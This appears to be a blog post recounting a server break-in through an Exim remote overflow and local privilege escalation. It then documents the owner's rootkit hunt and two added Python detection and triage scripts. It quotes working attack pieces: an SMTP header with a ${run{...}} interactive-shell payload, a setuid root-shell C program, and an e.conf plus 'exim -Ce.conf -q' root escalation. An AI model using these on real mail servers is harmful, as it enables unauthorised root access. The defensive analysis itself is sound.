Karl Hans Janke Kollaborativ
Heute die Welt, morgen das Sonnensystem!

System compromise


As if to put me in the right mood for the upcoming Chaos Communication Congress, the server that hosted this domain was externally realigned a few days ago. ;)

I hear the exploit has really been making the rounds (it was slashdotted, too). And I can kinda tell why: it is a really gorgeous remote buffer overflow / local privilege escalation combo in Exim, the Exim that was, until a few days ago, the default mail server on Debian stable.

As to how it works, quoting the report by someone named Sergey Kononenko:

Here I can put a brief sequence of the attack:

EHLO mail.domain.com
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>
DATA
MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB...
...
MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB...
HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{...
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbo...
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbo...
...
about 700000 of the same strings
...
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbo...
MAILbombMAILb
.

I'm not entirely sure what's going on in that header there, i.e. why that works, but it's obviously a remote hole that gets you a shell on the host. This would run as an unprivileged user, but, still quoting the same source:

After that the attacker gets a shell with the id of user Debian-exim and cwd in /var/spool/exim4; then it puts a file named setuid there, with trivial execution of a root shell:
#include <grp.h>     /* setgroups() */
#include <unistd.h>  /* setuid(), setgid(), execl() */

/* Once this binary is setuid root, drop into a root shell. */
int main(int argc, char *argv[])
{
    setuid(0);
    setgid(0);
    setgroups(0, NULL);
    execl("/bin/sh", "sh", (char *)NULL);
    return 1; /* only reached if execl() fails */
}

Yeah, that would spawn a root shell, if it could, e.g. if it were setuid root. The free sudo, as I'd like to call it. How do we get there? Check this out:

and creates another file e.conf with the following content:
spool_directory = ${run{/bin/chown root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}

then he runs:

exim -Ce.conf -q

Ahahahah! There we go, just tell Exim what we want, and it does it. As root. Thanks!
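For the remote stage, the practical takeaway is that a header value carrying an Exim expansion item such as ${run{...}} is never legitimate mail (the oversized body gets the message rejected, the rejection is logged together with its headers, and the overflow in that log formatting is what turns the header text into executed expansion code), so it is cheap to reject at the gateway or to alert on from a capture, whether or not the daemon behind it is still vulnerable. The checker below is an added example, not code from the original post or from Exim: it parses the header block of a DATA section the way a gateway rule would, reports expansion items in header values and implausibly large header blocks, and runs over a constructed sample shaped like the quoted transcript (with a harmless ${run{/bin/true}} standing in for the shell payload). The expansion-item list and the max_headers threshold are my assumptions.

```python
"""Flag Exim string-expansion items in the header block of an SMTP DATA section.

Added example, not code from the original post or from Exim. The sample
message is constructed to mirror the quoted attack transcript; the list of
dangerous items and the header-count threshold are assumptions.
"""
import re

# Expansion items that run code or read files/sockets. No legitimate header
# value contains these, so a single hit is enough to reject and alert.
DANGEROUS_ITEMS = ("${run{", "${readfile{", "${readsocket{", "${perl{", "${dlfunc{")

# RFC 5322 field name (printable ASCII except ':'), a colon, then the value.
HEADER_RE = re.compile(r"^([!-9;-~]+):[ \t]*(.*)$")


def parse_headers(data_section):
    """Return ([(name, value), ...], body_line_count) for a DATA section.

    Folded continuation lines are joined to the previous header. The header
    block ends at the first empty line or at the first line that is not a
    header, which is how the quoted attack switches from headers to the
    'MAILbomb' body without a blank separator.
    """
    lines = data_section.split("\n")
    headers = []
    i = 0
    while i < len(lines):
        line = lines[i]
        if line == "":
            i += 1          # blank line: end of headers, body follows
            break
        if line[:1] in (" ", "\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        else:
            m = HEADER_RE.match(line)
            if m is None:
                break       # neither header nor continuation: body starts here
            headers.append((m.group(1), m.group(2)))
        i += 1
    body_lines = [ln for ln in lines[i:] if ln not in ("", ".")]
    return headers, len(body_lines)


def find_dangerous(headers):
    """(header_name, item) for every header whose value carries an expansion item."""
    hits = []
    for name, value in headers:
        for item in DANGEROUS_ITEMS:
            if item in value:
                hits.append((name, item))
                break
    return hits


def assess(data_section, max_headers=100):
    """Summarise one DATA section; 'suspicious' is the gateway verdict."""
    headers, body_lines = parse_headers(data_section)
    dangerous = find_dangerous(headers)
    return {
        "header_count": len(headers),
        "body_lines": body_lines,
        "dangerous": dangerous,
        "suspicious": bool(dangerous) or len(headers) > max_headers,
    }


def build_sample(bomb_lines=20):
    """Constructed DATA section shaped like the quoted attack (sample data)."""
    lines = ["MAILbombhdr%04d: %s" % (n, "M4iLB0mb" * 4) for n in range(1, 55)]
    lines.append("HeaderX: ${run{/bin/true}}")      # stand-in for the shell payload
    lines += ["MAILbomb" * 6] * bomb_lines
    lines.append(".")
    return "\n".join(lines)


# Constructed control message: ordinary headers, no expansion items.
BENIGN = "From: alice@example.org\nTo: bob@example.org\nSubject: hi\n\nHello\n.\n"

if __name__ == "__main__":
    print(assess(build_sample()))
    print(assess(BENIGN))
```

On the constructed sample assess() reports 55 headers, 20 body lines and a hit on HeaderX; the benign message passes. The same logic applies to a packet capture or to the rejected-message headers Exim writes to its log, which is where you would look for this pattern after the fact.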

So, I copied any important data off the system. Then I ran chkrootkit and rkhunter. Both emitted a bunch of bogus warnings and the latter didn't find anything. However, chkrootkit spotted a curious bash process listening on a network port. The process could actually be seen on netstat. I killed it. And Exim.

Also, I noticed pstree showing two named processes. Wait… I'm not running DNS here. And were these in the ps I did earlier? Nope, ps omits them.

# grep named /etc/*
rc.local: /sbin/named # Starting named daemon

o.O

# cat /etc/rc.local
/sbin/named # Starting named daemon
/usr/sbin/sshd # Starting sshd daemon
/sbin/service iptables stop # Stopping firewall

Hm, I don't have /sbin/service. Looks like his kit was expecting Red Hat.

# strings /sbin/named
[...]
bash
Password: 
Incorrect password.
.-= Backdoor made by Mironov =-.
.-= Running =-.

Aha. Some Google hits on this from years past. shrug

# strings sshd | grep -C 3 backdoor
Could not chdir to home directory %s: %s
/dev/devno
xxxxx are %d entries in the log
xxxx xxxxx  backdoor
Oupss
session_new: init
session_new: session %d

Eheheh, so that's why my ssh session died.

# find / -user root -perm -4000  # setuid root
[...]
/sbin/shs
# strings /sbin/shs
[...]
[Welcome Morfeus]
/bin/sh

Yeah. So…
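Both the spool-directory trick from the privilege escalation above and the hunt through rc.local, setuid binaries and backdoor strings just shown come down to a handful of file-system checks, so here they are in one script. This is an added example, not code from the original post: it walks a tree and reports regular files with the setuid bit, rc.local lines outside an expected baseline, Exim expansion items in anything left in the spool directory, and binaries containing the marker strings found on this box. build_fixture() constructs a tree mirroring those findings so it runs offline; the baseline, marker list and directory layout are assumptions, and on a real host you would point triage() at a mounted image of the suspect disk (or at / from a trusted boot medium, since, as the hidden named processes and the replaced sshd show, the tools on the box itself cannot be trusted) and compare the output against a known-good system or the package manifests rather than a hard-coded list. For the local stage itself, the caveat is that Exim 4.73 closed it: a config given with -C by an untrusted caller only keeps root if the file is listed in the compile-time TRUSTED_CONFIG_LIST (/etc/exim4/trusted_configs on Debian); otherwise Exim drops privileges before reading it.

```python
"""Offline host-triage checks in the spirit of the investigation above.

Added example, not code from the original post. Walks a directory tree (a
mounted image of the suspect disk, or / on a live box) and reports:
  1. regular files with the setuid bit set,
  2. rc.local lines outside an expected baseline,
  3. Exim expansion items (${run{ ...) in files under the Exim spool,
  4. binaries containing the backdoor marker strings seen on this host.
build_fixture() constructs a small tree with those artefacts so the script
runs offline; baseline, markers and layout are assumptions.
"""
import os
import shutil
import stat
import tempfile

EXPANSION_ITEMS = (b"${run{", b"${readfile{", b"${readsocket{", b"${perl{", b"${dlfunc{")
BACKDOOR_MARKERS = (b"backdoor", b"Backdoor made by", b"Welcome Morfeus")
RC_LOCAL_BASELINE = {"exit 0"}   # assumption: a stock Debian rc.local has only this


def find_setuid(root):
    """(relative path, owner uid) for every regular file with the setuid bit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((os.path.relpath(path, root), st.st_uid))
    return sorted(hits)


def unexpected_rc_local(path, baseline=RC_LOCAL_BASELINE):
    """Non-comment lines of an rc.local that are not in the baseline."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        lines = [ln.strip() for ln in fh]
    return [ln for ln in lines if ln and not ln.startswith("#") and ln not in baseline]


def grep_files(root, needles):
    """(relative path, [matched needles]) for every file containing any needle."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                blob = fh.read()
            found = [n.decode() for n in needles if n in blob]
            if found:
                hits.append((os.path.relpath(path, root), found))
    return sorted(hits)


def triage(root):
    """Run all four checks against a tree rooted at `root`."""
    return {
        "setuid": find_setuid(root),
        "rc_local": unexpected_rc_local(os.path.join(root, "etc/rc.local")),
        "spool_expansions": grep_files(os.path.join(root, "var/spool/exim4"), EXPANSION_ITEMS),
        "backdoor_strings": grep_files(root, BACKDOOR_MARKERS),
    }


def build_fixture():
    """Constructed tree mirroring the artefacts found on the compromised host."""
    root = tempfile.mkdtemp(prefix="triage-")

    def put(rel, data, mode=0o644):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)

    put("etc/rc.local", b"#!/bin/sh\n/sbin/named # Starting named daemon\n"
                        b"/usr/sbin/sshd # Starting sshd daemon\nexit 0\n", 0o755)
    put("var/spool/exim4/setuid", b"\x7fELF stub", 0o4755)          # the root-shell helper
    put("var/spool/exim4/e.conf", b"spool_directory = ${run{/bin/chmod 4755 /var/spool/exim4/setuid}}\n")
    put("sbin/named", b"\x7fELF stub .-= Backdoor made by Mironov =-.", 0o755)
    put("sbin/shs", b"\x7fELF stub [Welcome Morfeus] /bin/sh", 0o4755)
    put("usr/sbin/sshd", b"\x7fELF stub xxxx xxxxx  backdoor", 0o755)
    put("usr/sbin/cron", b"\x7fELF stub nothing to see here", 0o755)  # clean control
    return root


if __name__ == "__main__":
    fixture = build_fixture()
    try:
        for check, result in triage(fixture).items():
            print(check, "->", result)
    finally:
        shutil.rmtree(fixture)
```

On the fixture, triage() flags the two setuid files (the helper in the spool and /sbin/shs), the two rc.local lines that start the fake named and the trojaned sshd, the ${run{ in e.conf, and the three binaries carrying marker strings, while the clean control binary stays quiet. The setuid check does not filter on owner, since on a live box the interesting question is which setuid files are not accounted for by a package, not only which are root-owned.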

As luck would have it, I was in the middle of migrating to a new machine anyway. So I completed the move and shut the old system down.

:)